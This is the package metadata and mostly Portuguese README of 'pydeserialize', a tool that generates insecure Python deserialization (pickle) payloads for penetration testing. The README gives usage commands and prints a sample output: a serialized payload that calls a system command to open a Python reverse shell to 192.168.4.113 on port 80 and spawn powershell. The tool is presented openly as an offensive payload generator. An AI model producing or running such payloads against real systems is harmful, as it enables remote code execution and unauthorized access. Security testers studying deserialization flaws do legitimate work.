Metadata-Version: 2.1
Name: pydeserialize
Version: 0.0.5
Summary: Insecure deserialization in python
Home-page: https://github.com/joaoviictorti/pyserialize
Author: joaoviictorti (viictorjj)
Author-email: joaovictorti08@gmail.com
License: MIT License
Keywords: serialize insegura desserialize
Classifier: Development Status :: 5 - Production/Stable
Classifier: Environment :: Console
Classifier: Intended Audience :: System Administrators
Classifier: License :: OSI Approved :: GNU General Public License v3 (GPLv3)
Classifier: Natural Language :: English
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3 :: Only
Classifier: Programming Language :: Python :: Implementation :: PyPy
Classifier: Topic :: Security
Classifier: Topic :: System :: Networking
Classifier: Topic :: System :: Operating System
Classifier: Topic :: System :: Systems Administration
Classifier: Topic :: Utilities
Requires-Python: >=3.6, <4
Description-Content-Type: text/markdown
License-File: LICENSE

<img width=100% src="https://capsule-render.vercel.app/api?type=waving&color=0000FF&height=120&section=header"/>

[![Typing SVG](https://readme-typing-svg.herokuapp.com/?color=0000FF&size=32&center=true&vCenter=true&width=1000&height=30&lines=pydeserialize)](https://git.io/typing-svg)



<h4 align="center">Tool for testing python insecure deserialization vulnerabilities</h4>


<p align="center">
  <a href="#caracterÃ­sticas">Features</a> â€¢
  <a href="#instalaÃ§Ã£o">Install</a> â€¢
  <a href="#forma-de-utilizaÃ§Ã£o">How to use</a> â€¢
  <a href="#executando-pydeserialize">Usage</a>
</p>

---


O pydeserialize Ã© uma ferramenta que gera payloads de desserializaÃ§Ã£o insegura em python. Possui uma funcionalidade que faz encode das payloads desejadas e dessa forma sendo simples e otimizada para velocidade. pydeserialize Ã© construÃ­do para fazer apenas uma coisa - gera payloads de desserializaÃ§Ã£o insegura + encodes e faz isso muito bem.

Projetei o `pydeserialize` para cumprir todas as responsabilidades para gera payloads e encodes, mantive um modelo consistentemente passivo para tornÃ¡-lo Ãºtil para testadores de penetraÃ§Ã£o.

# CaracterÃ­sticas

 - Gera payloads para explora vulnerabilidades de desserializaÃ§Ã£o insegura em python    

# Forma de utilizaÃ§Ã£o

```sh
pydeserialize -ip 192.168.4.113 -p 80 -e shell -o Windows
pydeserialize -ip 192.168.4.113 -e b64-p 80 -o Linux
```
Isso exibirÃ¡ a ajuda para a ferramenta. Aqui estÃ£o todos os switches que ele suporta:
```yaml
                 ,--.                            ,--.        ,--.,--.
 ,---.,--. ,--.,-|  | ,---.  ,---.  ,---. ,--.--.`--' ,--,--.|  |`--',-----. ,---.
| .-. |\  '  /' .-. || .-. :(  .-' | .-. :|  .--',--.' ,-.  ||  |,--.`-.  / | .-. :
| '-' ' \   ' \ `-' |\   --..-'  `)\   --.|  |   |  |\ '-'  ||  ||  | /  `-.\   --.
|  |-'.-'  /   `---'  `----'`----'  `----'`--'   `--' `--`--'`--'`--'`-----' `----'
`--'  `---'
     v0.0.1 - @joaoviictorti

options:
  -h, --help            show this help message and exit
  -ip IP                Insert ip
  -p PORT               Insert port
  -e {b64,shell,urlencode,hex} Insert encoding
  -o {Windows,Linux}    Insert operational system
```

# InstalaÃ§Ã£o

pydeserialize requer **python3** e para baixÃ¡-lo sÃ³ usar:

```sh
pip3 install pydeserialize
```

# Executando pydeserialize

```console
pydeserialize -ip 192.168.4.113 -p 80 -o Windows -e shell

                 ,--.                            ,--.        ,--.,--.
 ,---.,--. ,--.,-|  | ,---.  ,---.  ,---. ,--.--.`--' ,--,--.|  |`--',-----. ,---.
| .-. |\  '  /' .-. || .-. :(  .-' | .-. :|  .--',--.' ,-.  ||  |,--.`-.  / | .-. :
| '-' ' \   ' \ `-' |\   --..-'  `)\   --.|  |   |  |\ '-'  ||  ||  | /  `-.\   --.
|  |-'.-'  /   `---'  `----'`----'  `----'`--'   `--' `--`--'`--'`--'`-----' `----'
`--'  `---'
     v0.0.1 - @joaoviictorti

b'\x80\x04\x95\xf9\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\xe1python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.4.113",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("powershell")\'\x94\x85\x94R\x94.'
```

<img width=100% src="https://capsule-render.vercel.app/api?type=waving&color=0000FF&height=120&section=footer"/>
